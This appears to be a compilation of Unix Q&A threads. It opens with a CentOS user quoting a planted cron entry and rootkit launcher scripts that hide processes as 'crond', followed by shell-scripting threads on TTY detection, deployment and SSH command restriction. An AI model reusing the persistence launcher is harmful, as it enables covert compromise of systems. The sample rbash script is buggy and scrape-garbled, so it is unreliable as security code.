I am trying to figure out if my /var/spool/crontab/root is getting overwritten by a virus or malicious code:
I woke up this morning and my /var/spool/crontab/root file was empty, except for this line, which was not written by me:
* * * * * /usr/home/.bash_history/update > /dev/null 2>&1
I looked for this update file that is set to run, and this is what it contains:
#!/bin/sh
if test -r /usr/home/.bash_history/pid; then
Pid=$(cat /usr/home/.bash_history/pid)
if $(kill -CHLD $Pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/home/.bash_history
./run &>/dev/null
That update file calls a file named run, which contains:
#!/bin/bash
ARCH=`uname -m`
HIDE="crond"
if [ "$ARCH" == "i686" ]; then
./h32 -s $HIDE ./run32
elif [ "$ARCH" == "x86_64" ]; then
./h64 -s $HIDE ./run64
fi
Here are the full contents of that /usr/home directory, which I do not recognize:
I am running centos6.8
I think you've been hacked, possibly by someone using a downloadable rootkit. They're available to any moron with a modem, many of whom won't even know what to do with the system once they've successfully hacked in.
The safest thing you can do is re-install the OS from scratch, and this time employ much stronger passwords. (Sorry, "pa$$w0rd" don't cut it.) You might try just changing passwords and scouring the system for anything suspicious, but there's a good chance something was changed that you'll never recognize.
I had a system hacked once where they replaced the "ls", "ps", and who knows what other commands with substitutes that skipped over their meddling, making it much more difficult to be 100% certain we'd found and fixed all their changes.
After your re-install, look up how to convert the shadow hashing to use SHA512. The default hashing algorithm is stored in /etc/login.defs, and is probably MD5, not nearly strong enough these days. But even with a stronger hash, many weak passwords fall quickly to a brute force attack.
While you're at it, you might as well get CentOS 6.9 which will include more security patches.
Related
I have a bash script from which I want to access /dev/tty, but only when it's available.
When it's not available (in my case: when running my script in GitHub Actions) then when I try to access it I get /dev/tty: No such device or address, and I'm trying to detect that in advance to avoid the error and provide fallback behaviour instead.
To do so I need a bash test that can detect cleanly this case, and which will work reliably across platforms (i.e. not using the tty command, which has issues on Mac).
I'm currently using [[ -e "/dev/tty" ]] which doesn't work - it appears to return true even on GitHub Actions, where it seems that /dev/tty exists but accessing it will fail. What should I use instead?
After testing lots of promising but not quite perfect suggestions (see the other answers), I think I've found my own solution that does exactly fit my needs:
if sh -c ": >/dev/tty" >/dev/null 2>/dev/null; then
# /dev/tty is available and usable
else
# /dev/tty is not available
fi
To explain:
: >/dev/tty does nothing (using the : bash built-in) and outputs the nothing to /dev/tty, thereby checking that it exists & it's writable, but not actually producing any visible output. If this succeeds, we're good.
If we do that at the top level without a /dev/tty, bash itself produces a noisy error in our output, complaining about /dev/tty being unusable. This can't be redirected and silenced because it comes from bash itself, not the : command.
Wrapping that with sh -c "..." >/dev/null 2>/dev/null runs the test in a bash subshell, with stdout/stderr removed, and so silences all errors & warnings while still returning the overall exit code.
Suggestions for further improvements welcome. For reference, I'm testing this with setsid <command>, which seems to be a good simulation of the TTY-less environment I'm having trouble with.
Try this approach :
if test "$(ps -p "$$" -o tty=)" = "?"; then
echo "/dev/tty is not available."
else
echo "/dev/tty is available."
fi
Instead of spawning a new shell process to test if /dev/tty can really be opened for writing (test -w lies, you know?), you can try to redirect stdout to /dev/tty from a subshell like so:
if (exec < /dev/tty) ; then
# /dev/tty is available
else
# no tty is available
fi
This is POSIX syntax and should work in any shell.
It seems that adapting this answer from this question on ServerFault (entitled How can I check in bash if a shell is running in interactive mode?, which is close to your question albeit not an exact duplicate) could be a solution for your use case.
So, could you try writing either:
[ -t 0 ] && [ -t 1 ] && echo your code
or [ -t 0 ] && echo your code ?
For completeness, here is one link documenting this POSIX flag -t, which is thus portable:
https://pubs.opengroup.org/onlinepubs/9699919799/utilities/test.html
-t file_descriptor
True if file descriptor number file_descriptor is open and is associated with a terminal.
False if file_descriptor is not a valid file descriptor number, or if file descriptor number file_descriptor is not open, or if it is open but is not associated with a terminal.
Furthermore, if you use bash (not just a POSIX-compliant shell), you might want to combine this idea with the special 255 file descriptor number: [ -t 255 ].
Source: On Unix&Linux-SE,
That 255 file descriptor is an open handle to the controlling tty and is only used when bash is run in interactive mode.
[…]
− In Bash, what is file descriptor 255 for, can I use it? (by #mosvy)
Beyond the other answers mentioned in this thread (and as an alternative to the other idea involving $-, which did not seem to work for you), what about this other idea mentioned in the bash manual?
if [ -z "$PS1" ]; then
echo This shell is not interactive
else
echo This shell is interactive
fi
What is the best way to write a shell script that will access files relative to it such that it doesn't matter where I call it from? "Easy" means the easiest/recommended way that will work across different systems/shells.
Example
Say I have a folder ~/MyProject with subfolders scripts/ and files/. In scripts/, I have a shell script foo.sh that wants to access files in files/:
if [ -f "../files/somefile.ext" ]; then
echo "File found"
else
echo "File not found"
fi
It'll work fine If I do cd ~/MyProject/scripts && ./foo.sh, but it will fail with cd ~/MyProject && scripts/foo.sh.
You can usually do:
mydir="$(dirname $0)"
to get the directory of the running script.
Then just use that to locate your files.
Make all paths absolute.
Use environmental variables when possible, for example $HOME.
You are running into a weakness of UNIX scripting.
Using a .profile or .bash_profile, your developers could set a bunch of ENV variables. Then your scripts could make use of those variables.
In one of the places I worked, you could run a script, that would prompt you for which version you wanted to look at, and set the ENVs such that developer interaction was pretty seamless.
Not sure if it's easy enough for you but this could give you a solution:
Shell Script Loader
if [ -f "../files/somefile.ext"]
then
echo "file was found"
else
echo "file was not found"
fi
second:
if [ ! -f /tmp/foo.txt ]; then
echo "File not found!"
fi
Unfortunately there doesn't seem to be a truly generic solution. My personal recommendation (and practice) is to write only for shells that provide consistent access to this--recent ksh93's ${.sh.file}, bash's $BASH_SOURCE, etc. (I don't know the zsh solution, but I'm sure there is one.)
Beyond that, the best solution is to avoid the problem in some way; e.g., for your example of a script in a git repository, you could require that the script be called from the directory it's in. After validating that by checking [[ -e myscript ]], you can then expect that relative links will work as expected. (Yes, for full robustness, you'll need to hardcode the basename of the script into the test, for the same reason this problem exists in the first place--it's available to the shell in all conceivable circumstances.)
Considering that $0 should contain the path to the executed script, you can simply cd to it and then process normally
So you simply do
scriptDir=$(dirname -- "$0")
cd -- "$scriptDir"
But that is still a hack, you probably should think of a way to work with absolute paths
I was thinking about running commands at system start as a regular user. Currently, to do so, I use a syntax like this:
su -c 'command with some arguments' user
But I was thinking that it might be beneficial to have a per-user rc.local file at ~/.rc.local that would automatically get run as the user at startup. The code I came up for it is like this:
awk -F":" '{ if ($3 >= 1000) print $1, $6 }' /etc/passwd | while read u h
do
[ -x "$h/.rc.local" ] && su -c "cd $h; ./.rc.local" $u
done
This would be added to /etc/rc.local. It searches the home directory of every non-system user (i.e., a uid >= 1000), and if the file exists, and is executable, it cd's to the users home directory and executes that script as the user.
To me, this seems to eliminate any source of security risk, since it would be executing the script as the user, rather than root, but I've recently been reminded of my lack of security knowledge, so I present this question: is this a bad idea?
Right now, I'd only be running this on my home computer, and my home computer only has one non-system user. A few years down the road, my daughter my get her own account on the computer, but besides that, it's not like complete strangers will have access to this in any way.
So, is there any potential security hole that I'm overlooking? Also, is there a more elegant way to write that command?
This overlaps with the #reboot capability of per-user crontabs.
I feel silly asking this...
I am not an expert on shell scripting, but I am finally in enough of a sysadmin role that I want to do this correctly.
I have a production server that hosts a webapp. Here is my routine.
1 - ssh to server
2 - cd django_src/django_apps/team_proj
3 - svn update
4 - sudo /etc/init.d/apache2 restart
5 - logout
I want to create a shell script for steps 2,3,4.
I can do this, but it will be a very plain and simple bash script simply containing the actual commands I type at the command line.
My question: What is the best way to script this kind of repetitive procedure in bash (Linux, Ubuntu) for a remote server?
Thanks!
The best way is simply as you suggest. Some things you should do for your script would be:
put set -e at the top of the script (after the shebang). This will cause your script to stop if any of the commands fail. So if it cannot cd to the directory, it will not run svn update or restart apache. You can do this programmatically by putting || exit 0 after each command, but if that's all you're doing, you may as well use set -e
Use full paths in your script. Do not assume the directory that the script is run from. In this specific case, the cd command has a relative path. Use a full (absolute) path, or use an environment variable like $HOME.
You may want to set up sudo so that it can run the command without asking for a password. This makes your script non-interactive which means it can be run in the background and from cron jobs and such.
As time goes by, you may add features and take command line arguments to parameterise the script. But don't bother doing this up front. Just evolve your scripts as you need.
There is nothing wrong with a simple bash script simply containing the actual commands you type at the command line. Don't make it more complicated than necessary.
I'd setup a cron job doing that automatically.
Since you're using python, check out fabric - you can use it to automate these kind of tasks. First install fabric:
$ sudo easy_install fabric
then write your fabric script:
from __future__ import with_statement
from fabric.api import *
def svnupdate():
with cd('django_src/django_apps/team_proj'):
run('svn update')
sudo('/etc/init.d/apache2 restart')
Save as fabfile.py, then run using the fab command:
$ fab -H hostname svnupdate
Tell me that's not cool! :-)
you can do this with the shell (bash,ksh,zsh + ssh + tools), or programming languages such as Python,Perl(Ruby or PHP or Java) etc, basically a language that supports SSH protocol and operating system functions. The "best" one is the one that you are more comfortable and have knowledge in. If you are doing sysadmin, the shell is the closest thing you can use. Then after you have done your script, you can use the crontab (cron) , or the at command to schedule your task. check their man page for more information
You can easily do the above using bash/Bourne etc.
However I would take the time and effort to learn Perl (or some similarly powerful scripting language). Why ?
the language constructs are much more powerful
there are no end of libraries to interface to the systems/features you want to script
because of the library support, you won't have to spawn off different commands to achieve what you want (possibly valuable on a loaded system)
you can decompose frequently-used scripts into your own libraries for later use
I choose Perl particularly because it's been designed (perhaps designed is too strong a word for Perl) for these sort of tasks. However you may want to check out Ruby/Python or other suggestions from SO contributers.
For the basic steps look at camh's answer. If you plan to run the script via cron, then implement some simple logging, e.g. by appending start time of each command with exit code to a textfile which you can later analyze for failures of the script.
Expect -- scripting interactive applications
Expect is a tool for automating interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, etc.... Expect can make easy all sorts of tasks that are prohibitively difficult with anything else. You will find that Expect is an absolutely invaluable tool - using it, you will be able to automate tasks that you've never even thought of before - and you'll be able to do this automation quickly and easily.
http://expect.nist.gov
bonus: Your tax dollars at work!
I would probably do something like this...
project_update.sh
#!/bin/bash
#
# $1 - user#host
# $2 - project directory
[[ -z $1 || -z $2 ]] && { echo "usage: $(basename $0) user#host project_dir"; exit 1; }
declare host=$1 proj_dir=$2
ssh $host "cd $proj_dir;svn update;sudo /etc/init.d/apache2 restart" && echo "Success"
Just to add another tip - you should not give users access to some application in an unknown state. svn up might break during the update, users might see a page that's half-new half-old, etc. If you're deploying the whole application at once, I'd suggest doing svn export instead to a new directory and then either mv current old ; mv new current, or even keeping current as a link to the directory you're using now. Still not perfect and not blocking every possible race condition, but it definitely takes less time than svn up on the live copy.
This is a idea for a security. Our employees shall have access to some commands on a linux server but not all. They shall e.g. have the possibility to access a log file (less logfile) or start different commands (shutdown.sh / run.sh).
Background information:
All employees access the server with the same user name: Our product runs with "normal" user permissions, no "installation" is needed. Just unzip it in your user dir and run it. We manage several servers where our application is "installed". On every machine there is a user johndoe. Our employees sometimes need access to the application on command line to access and check log files or to restart the application by hand. Only some people shall have full command line access.
We are using ppk authentication on the server.
It would be great if employee1 can only access the logfile and employee2 can also do X etc...
Solution:
As a solution I'll use the command option as stated in the accepted answer. I'll make my own little shell script that will be the only file that can be executed for some employees. The script will offer several commands that can be executed, but no others. I'll use the following parameters in authorized_keys from as stated here:
command="/bin/myscript.sh",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty
ssh-dss AAAAB3....o9M9qz4xqGCqGXoJw= user#host
This is enough security for us. Thanks, community!
You can also restrict keys to permissible commands (in the authorized_keys file).
I.e. the user would not log in via ssh and then have a restricted set of commands but rather would only be allowed to execute those commands via ssh (e.g. "ssh somehost bin/showlogfile")
ssh follows the rsh tradition by using the user's shell program from the password file to execute commands.
This means that we can solve this without involving ssh configuration in any way.
If you don't want the user to be able to have shell access, then simply replace that user's shell with a script. If you look in /etc/passwd you will see that there is a field which assigns a shell command interpreter to each user. The script is used as the shell both for their interactive login ssh user#host as well as for commands ssh user#host command arg ....
Here is an example. I created a user foo whose shell is a script. The script prints the message my arguments are: followed by its arguments (each on a separate line and in angle brackets) and terminates. In the log in case, there are no arguments. Here is what happens:
webserver:~# ssh foo#localhost
foo#localhost's password:
Linux webserver [ snip ]
[ snip ]
my arguments are:
Connection to localhost closed.
If the user tries to run a command, it looks like this:
webserver:~# ssh foo#localhost cat /etc/passwd
foo#localhost's password:
my arguments are:
<-c>
<cat /etc/passwd>
Our "shell" receives a -c style invocation, with the entire command as one argument, just the same way that /bin/sh would receive it.
So as you can see, what we can do now is develop the script further so that it recognizes the case when it has been invoked with a -c argument, and then parses the string (say by pattern matching). Those strings which are allowed can be passed to the real shell by recursively invoking /bin/bash -c <string>. The reject case can print an error message and terminate (including the case when -c is missing).
You have to be careful how you write this. I recommend writing only positive matches which allow only very specific things, and disallow everything else.
Note: if you are root, you can still log into this account by overriding the shell in the su command, like this su -s /bin/bash foo. (Substitute shell of choice.) Non-root cannot do this.
Here is an example script: restrict the user into only using ssh for git access to repositories under /git.
#!/bin/sh
if [ $# -ne 2 ] || [ "$1" != "-c" ] ; then
printf "interactive login not permitted\n"
exit 1
fi
set -- $2
if [ $# != 2 ] ; then
printf "wrong number of arguments\n"
exit 1
fi
case "$1" in
( git-upload-pack | git-receive-pack )
;; # continue execution
( * )
printf "command not allowed\n"
exit 1
;;
esac
# Canonicalize the path name: we don't want escape out of
# git via ../ path components.
gitpath=$(readlink -f "$2") # GNU Coreutils specific
case "$gitpath" in
( /git/* )
;; # continue execution
( * )
printf "access denied outside of /git\n"
exit 1
;;
esac
if ! [ -e "$gitpath" ] ; then
printf "that git repo doesn't exist\n"
exit 1
fi
"$1" "$gitpath"
Of course, we are trusting that these Git programs git-upload-pack and git-receive-pack don't have holes or escape hatches that will give users access to the system.
That is inherent in this kind of restriction scheme. The user is authenticated to execute code in a certain security domain, and we are kludging in a restriction to limit that domain to a subdomain. For instance if you allow a user to run the vim command on a specific file to edit it, the user can just get a shell with :!sh[Enter].
What you are looking for is called Restricted Shell. Bash provides such a mode in which users can only execute commands present in their home directories (and they cannot move to other directories), which might be good enough for you.
I've found this thread to be very illustrative, if a bit dated.
Why don't you write your own login-shell? It would be quite simple to use Bash for this, but you can use any language.
Example in Bash
Use your favorite editor to create the file /root/rbash.sh (this can be any name or path, but should be chown root:root and chmod 700):
#!/bin/bash
commands=("man" "pwd" "ls" "whoami")
timestamp(){ date +'%Y-%m-%s %H:%M:%S'; }
log(){ echo -e "$(timestamp)\t$1\t$(whoami)\t$2" > /var/log/rbash.log; }
trycmd()
{
# Provide an option to exit the shell
if [[ "$ln" == "exit" ]] || [[ "$ln" == "q" ]]
then
exit
# You can do exact string matching for some alias:
elif [[ "$ln" == "help" ]]
then
echo "Type exit or q to quit."
echo "Commands you can use:"
echo " help"
echo " echo"
echo "${commands[#]}" | tr ' ' '\n' | awk '{print " " $0}'
# You can use custom regular expression matching:
elif [[ "$ln" =~ ^echo\ .*$ ]]
then
ln="${ln:5}"
echo "$ln" # Beware, these double quotes are important to prevent malicious injection
# For example, optionally you can log this command
log COMMAND "echo $ln"
# Or you could even check an array of commands:
else
ok=false
for cmd in "${commands[#]}"
do
if [[ "$cmd" == "$ln" ]]
then
ok=true
fi
done
if $ok
then
$ln
else
log DENIED "$cmd"
fi
fi
}
# Optionally show a friendly welcome-message with instructions since it is a custom shell
echo "$(timestamp) Welcome, $(whoami). Type 'help' for information."
# Optionally log the login
log LOGIN "$#"
# Optionally log the logout
trap "trap=\"\";log LOGOUT;exit" EXIT
# Optionally check for '-c custom_command' arguments passed directly to shell
# Then you can also use ssh user#host custom_command, which will execute /root/rbash.sh
if [[ "$1" == "-c" ]]
then
shift
trycmd "$#"
else
while echo -n "> " && read ln
do
trycmd "$ln"
done
fi
All you have to do is set this executable as your login shell. For example, edit your /etc/passwd file, and replace your current login shell of that user /bin/bash with /root/rbash.sh.
This is just a simple example, but you can make it as advanced as you want, the idea is there. Be careful to not lock yourself out by changing login shell of your own and only user. And always test weird symbols and commands to see if it is actually secure.
You can test it with: su -s /root/rbash.sh.
Beware, make sure to match the whole command, and be careful with wildcards! Better exclude Bash-symbols such as ;, &, &&, ||, $, and backticks to be sure.
Depending on the freedom you give the user, it won't get much safer than this. I've found that often I only needed to make a user that has access to only a few relevant commands, and in that case this is really the better solution.
However, do you wish to give more freedom, a jail and permissions might be more appropriate. Mistakes are easily made, and only noticed when it's already too late.
You should acquire `rssh', the restricted shell
You can follow the restriction guides mentioned above, they're all rather self-explanatory, and simple to follow. Understand the terms `chroot jail', and how to effectively implement sshd/terminal configurations, and so on.
Being as most of your users access your terminals via sshd, you should also probably look into sshd_conifg, the SSH daemon configuration file, to apply certain restrictions via SSH. Be careful, however. Understand properly what you try to implement, for the ramifications of incorrect configurations are probably rather dire.
GNU Rush may be the most flexible and secure way to accomplish this:
GNU Rush is a Restricted User Shell, designed for sites that provide limited remote access to their resources, such as svn or git repositories, scp, or the like. Using a sophisticated configuration file, GNU Rush gives you complete control over the command lines that users execute, as well as over the usage of system resources, such as virtual memory, CPU time, etc.
You might want to look at setting up a jail.
[Disclosure: I wrote sshdo which is described below]
If you want the login to be interactive then setting up a restricted shell is probably the right answer. But if there is an actual set of commands that you want to allow (and nothing else) and it's ok for these commands to be executed individually via ssh (e.g. ssh user#host cmd arg blah blah), then a generic command whitelisting control for ssh might be what you need. This is useful when the commands are scripted somehow at the client end and doesn't require the user to actually type in the ssh command.
There's a program called sshdo for doing this. It controls which commands may be executed via incoming ssh connections. It's available for download at:
http://raf.org/sshdo/ (read manual pages here)
https://github.com/raforg/sshdo/
It has a training mode to allow all commands that are attempted, and a --learn option to produce the configuration needed to allow learned commands permanently. Then training mode can be turned off and any other commands will not be executed.
It also has an --unlearn option to stop allowing commands that are no longer in use so as to maintain strict least privilege as requirements change over time.
It is very fussy about what it allows. It won't allow a command with any arguments. Only complete shell commands can be allowed.
But it does support simple patterns to represent similar commands that vary only in the digits that appear on the command line (e.g. sequence numbers or date/time stamps).
It's like a firewall or whitelisting control for ssh commands.
And it supports different commands being allowed for different users.
Another way of looking at this is using POSIX ACLs, it needs to be supported by your file system, however you can have fine-grained tuning of all commands in linux the same way you have the same control on Windows (just without the nicer UI). link
Another thing to look into is PolicyKit.
You'll have to do quite a bit of googling to get everything working as this is definitely not a strength of Linux at the moment.